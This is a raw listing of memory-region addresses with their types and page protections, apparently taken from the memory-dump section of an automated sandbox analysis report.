heap
page read and write
72BE000
stack
page read and write
190B8350000
heap
page read and write
28FD000
stack
page read and write
7FFD9BA60000
trusted library allocation
page read and write
7FFD9B753000
trusted library allocation
page execute and read and write
190BA0A5000
heap
page read and write
190BA0DA000
heap
page read and write
7570000
trusted library allocation
page read and write
21EF27A4000
heap
page read and write
7FFD9BA40000
trusted library allocation
page read and write
21EF05F0000
trusted library section
page read and write
21EF2775000
heap
page read and write
87C0000
direct allocation
page execute and read and write
6E80000
direct allocation
page read and write
190BA1DD000
heap
page read and write
21EF0600000
trusted library section
page read and write
ADF027E000
stack
page read and write
7FFD9B806000
trusted library allocation
page read and write
485D000
stack
page read and write
21EF06C5000
heap
page read and write
190BA1CD000
heap
page read and write
7FFD9B870000
trusted library allocation
page execute and read and write
5A31000
trusted library allocation
page read and write
21EF2770000
heap
page read and write
21EF27F1000
heap
page read and write
21EF27FD000
heap
page read and write
190B835A000
heap
page read and write
190BA0DA000
heap
page read and write
7FFD9B75D000
trusted library allocation
page execute and read and write
2335C350000
heap
page read and write
21E90074000
trusted library allocation
page read and write
2F60000
trusted library allocation
page read and write
21E8072C000
trusted library allocation
page read and write
190BA0C6000
heap
page read and write
4A79000
trusted library allocation
page read and write
190B816E000
heap
page read and write
190B81D0000
heap
page read and write
190B81A7000
heap
page read and write
190B9F6C000
heap
page read and write
21EF1FD0000
heap
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
7FFD9B90A000
trusted library allocation
page read and write
76E0000
trusted library allocation
page read and write
81B0000
trusted library allocation
page read and write
190BA0D4000
heap
page read and write
4A21000
trusted library allocation
page read and write
7FFD9B980000
trusted library allocation
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
190B835E000
heap
page read and write
49C5000
heap
page execute and read and write
7FFD9B810000
trusted library allocation
page execute and read and write
ADF12CA000
stack
page read and write
21EF24D0000
heap
page read and write
7780000
trusted library allocation
page read and write
190B81D5000
heap
page read and write
2DF0000
trusted library section
page read and write
190BA1B6000
heap
page read and write
21E8080E000
trusted library allocation
page read and write
2E00000
heap
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
4A10000
heap
page execute and read and write
7FFD9B9C0000
trusted library allocation
page read and write
74E5000
heap
page read and write
190BA098000
heap
page read and write
7FFD9B901000
trusted library allocation
page read and write
8ABADFC000
stack
page read and write
190BA0EE000
heap
page read and write
190B9F6F000
heap
page read and write
190B81E5000
heap
page read and write
ADF11CE000
stack
page read and write
2F1D000
trusted library allocation
page execute and read and write
ADF02FE000
stack
page read and write
190BA190000
remote allocation
page read and write
76D0000
trusted library allocation
page execute and read and write
8529000
heap
page read and write
7419000
heap
page read and write
21E8120E000
trusted library allocation
page read and write
7560000
trusted library allocation
page read and write
190BA20B000
heap
page read and write
7FFD9B920000
trusted library allocation
page execute and read and write
2A1E000
unkown
page read and write
2335BFF0000
heap
page read and write
190B8359000
heap
page read and write
190B8203000
heap
page read and write
8500000
heap
page read and write
190BA0C6000
heap
page read and write
21EF1F22000
trusted library allocation
page read and write
21EF0560000
heap
page read and write
190B815F000
heap
page read and write
190B9F6F000
heap
page read and write
190BA0D4000
heap
page read and write
7750000
trusted library allocation
page read and write
190B9C00000
heap
page read and write
21EF1FB0000
heap
page read and write
5323000
trusted library allocation
page read and write
190BA0D4000
heap
page read and write
21E80790000
trusted library allocation
page read and write
190B9F87000
heap
page read and write
E115000
direct allocation
page execute and read and write
21EF06AB000
heap
page read and write
2335C060000
heap
page read and write
190B820E000
heap
page read and write
190B815F000
heap
page read and write
190B9FA4000
heap
page read and write
2F20000
trusted library allocation
page read and write
8ABAEFB000
stack
page read and write
2928000
stack
page read and write
2DE0000
trusted library section
page read and write
81C0000
trusted library allocation
page read and write
ADF1183000
stack
page read and write
21EF1F80000
heap
page execute and read and write
8ABABFF000
stack
page read and write
7FFD9B910000
trusted library allocation
page execute and read and write
2B80000
heap
page read and write
190B8200000
heap
page read and write
21E90010000
trusted library allocation
page read and write
21EF062B000
heap
page read and write
7FFD9B760000
trusted library allocation
page read and write
190BA0C1000
heap
page read and write
190BA070000
heap
page read and write
7FFD9BA30000
trusted library allocation
page read and write
190BA071000
heap
page read and write
7FFD9BA90000
trusted library allocation
page read and write
ADF124D000
stack
page read and write
190B9F7B000
heap
page read and write
8830000
trusted library allocation
page execute and read and write
49C0000
heap
page execute and read and write
190B820E000
heap
page read and write
21EF2460000
trusted library allocation
page read and write
21E80227000
trusted library allocation
page read and write
190BA1DA000
heap
page read and write
190B9F78000
heap
page read and write
8520000
heap
page read and write
77B0000
trusted library allocation
page read and write
7321000
heap
page read and write
21E804AE000
trusted library allocation
page read and write
There are 493 hidden memdumps, click here to show them.